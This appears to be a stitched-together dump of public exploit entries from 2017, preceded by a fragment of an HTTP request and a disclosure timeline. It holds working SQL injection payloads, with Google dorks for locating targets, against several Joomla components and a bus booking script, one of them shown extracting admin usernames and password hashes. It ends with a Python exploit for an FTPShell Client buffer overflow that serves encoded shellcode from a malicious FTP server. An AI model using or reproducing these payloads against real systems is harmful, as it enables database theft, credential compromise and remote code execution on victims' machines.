Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/side.htm
Connection: close
Upgrade-Insecure-Requests: 1
------------------------------------------------------------------------------------------
Timeline:
------------------------------------------------------------------------------------------
12/1/2016 - Discovery.
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
3/3/2017 - Disclosure
------------------------------------------------------------------------------------------
# # # # #
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #
# # # # #
# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_aysquiz
# Date: 04.03.2017
# Vendor Homepage: http://ays-pro.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
# Demo: http://demo.ays-pro.com/index.php/ays-quiz
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
# For example;
# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
# :title<li>whlzd_users
# :id<li>whlzd_users
# :name<li>whlzd_users
# :username<li>whlzd_users
# :email<li>whlzd_users
# :password<li>whlzd_users
# :block<li>whlzd_users
# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
# <input class='ays_radio hide' type='radio' id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_monthlyarchive
# Date: 04.03.2017
# Vendor Homepage: http://web357.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
# Version: 3.6.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# # # # #
# # # # #
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_os_cck
# Date: 04.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
# Demo: http://ordasvit.com/joomla-cck-classic/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
# Etc..
# # # # #
# # # # #
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
# Demo: https://www.nordmograph.com/workshop/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #
# # # # #
# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/newbusbooking/
# Version: 2.04
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
# # # # #
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing
import socket
import sys
shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
"\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
"\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
"\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
"\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
"\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
"\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
"\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
"\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
"\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
"\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
"\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
"\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
"\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
"\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
"\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
"\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
"\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
"\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
"\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
"\x79\x47\xd8\xc8\x7a\x42")
port = 21
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
# 004b95dc in ftpshell.exe PUSH ESI ; RETN
eip = "\xdc\x95\x4b"
nops = "\x90"*8
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip
while True:
conn, addr = s.accept()
conn.send('220 Welcome to your unfriendly FTP server\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+buffer+'" is current directory\r\n')